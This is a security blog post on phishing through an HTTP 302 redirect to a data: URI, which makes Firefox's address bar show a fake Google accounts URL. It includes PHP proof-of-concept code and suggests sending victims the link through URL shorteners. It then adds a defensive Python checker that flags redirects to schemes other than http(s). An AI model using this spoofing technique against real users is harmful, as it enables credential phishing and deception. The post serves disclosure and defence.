1/ Introduction
Little-known fact: you can redirect HTTP to a data: URI.
2/ Let's have fun with redirect
Create a php file:

<?php
// A redirect whose target is a data: URI rather than an http(s) URL
header("Location: data:text,Hello World");
?>

and serve it to Firefox. In all its glory, Firefox will print "Hello World!"

3/ Enhance with phishing
And yes, you can use HTML instead of pure text. And with HTML, you can do what you want. And the beginning of the data: URI will be printed in the address bar. Looks good for having fun.

- First, add HTML capabilities:
  data:text/html
- Second, trick the user through the address bar, because the address bar will print the content of the data: scheme:
  https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1&osid=1
- Third, add some HTML (and clean up what is already rendered):
  <html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>
- Fourth, be nice by adding a pretty thing in the tab bar of Firefox:
  Google
4/ Ready to go:
Create a php file like this:

<?php
// Scheme and media type: the browser renders what follows as HTML
$data_uri = "data:text/html,";
// Decoy: the start of the data: URI is what Firefox prints in the address bar
$decoy = "https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1&osid=1";
// Page body; the script wipes the decoy text so it only shows in the address bar
$evil_html = "<html><script>document.body.innerHTML = '';</script><br>No, this is not from google accounts!!<br><br></html>";
// Trailing text ends up as the tab title
$pretty_tab_print = "Google";
$redirect_url = $data_uri . $decoy . $evil_html . $pretty_tab_print;
// 302 redirect straight to the data: URI
header("Location: " . $redirect_url);
?>
And trick a user into going to this page (you know, phishing stuff, with bit.ly or any URL shortener).
A click on this php file served through a web server will drive you to:
4/ Is it something new?
Well, yes and no. Phishing with data URIs has been known for a very long time; a paper was published some time ago: http://klevjers.com/papers/phishing.pdf
This is the same idea; I've added the vector with the 302 redirect.
It's not a big deal: if you're tricked by this, you can be tricked by anything else.
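On the defending side, the thing to check is the scheme of the Location header itself, not any URL-shaped text that appears inside it: a filter that only looks for "https://accounts.google.com" in the redirect target would happily pass the payload above. The Python below is an added example for this post, not code from the original article. It parses a raw HTTP response head, classifies the redirect by the scheme before the first colon, flags anything that is not http(s) (the data: case from this post, but also javascript:, file: and the like), and, for data: URIs, reports which host the payload is made to look like. The sample responses are constructed to mirror the post's redirect, not captured traffic. Note that current Firefox releases refuse top-level navigations to data: URLs, so the trick no longer works as described in the browser itself, but the server-side check remains a useful gate in a proxy, gateway or scanner.

```python
"""Flag HTTP redirects whose Location points at a non-http(s) scheme.

Added defensive example, not part of the original post. The sample
responses below are constructed for the example, not captured traffic.
"""
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
# URL-shaped text inside a data: payload (stops at whitespace, tags or quotes)
URL_LOOKALIKE = re.compile(r"https?://[^\s<>'\"]+")


def parse_response_head(raw):
    """Split a raw HTTP response head into (status code, {lowercased header: value})."""
    lines = raw.splitlines()
    status = int(lines[0].split()[1])  # "HTTP/1.1 302 Found" -> 302
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify_redirect(raw):
    """Describe where a redirect really sends the browser.

    The scheme is taken from the Location value itself (everything before
    the first ':'), so a data: URI that merely contains 'https://accounts...'
    is still reported with scheme 'data'.
    """
    status, headers = parse_response_head(raw)
    location = headers.get("location")
    if status not in REDIRECT_STATUSES or location is None:
        return {"redirect": False}

    scheme = urlsplit(location).scheme.lower()
    finding = {
        "redirect": True,
        "status": status,
        "scheme": scheme or "relative",
        # Relative targets resolve against the current origin; anything that
        # is not http(s) (data:, javascript:, file:, ...) deserves a closer look.
        "suspicious": bool(scheme) and scheme not in SAFE_SCHEMES,
        "lookalike_host": None,
    }
    if scheme == "data":
        # data:[<mediatype>][;base64],<payload>: inspect the payload for a decoy URL
        payload = location.partition(",")[2]
        match = URL_LOOKALIKE.search(payload)
        if match:
            finding["lookalike_host"] = urlsplit(match.group(0)).hostname
    return finding


# Constructed samples (not captured traffic)
SAMPLE_DATA_REDIRECT = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Location: data:text/html,https://accounts.google.com/ServiceLogin?service=mail"
    "&passive=true&continue=https://mail.google.com/mail/&ltmpl=default"
    "<html><script>document.body.innerHTML = '';</script>"
    "<br>No, this is not from google accounts!!<br></html>Google\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAMPLE_NORMAL = "HTTP/1.1 302 Found\r\nLocation: https://example.com/login\r\n\r\n"
SAMPLE_RELATIVE = "HTTP/1.1 303 See Other\r\nLocation: /login\r\n\r\n"
SAMPLE_OK = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    for name, raw in [("data redirect", SAMPLE_DATA_REDIRECT), ("normal", SAMPLE_NORMAL),
                      ("relative", SAMPLE_RELATIVE), ("no redirect", SAMPLE_OK)]:
        print(f"{name:13s} -> {classify_redirect(raw)}")
```

The check deliberately ignores the status line's reason phrase and any URL that appears later in the header value; only the prefix before the first colon decides the scheme, which is exactly how the browser decides it. A proxy could drop or rewrite any redirect the function marks as suspicious, and the lookalike host makes a useful field in the alert.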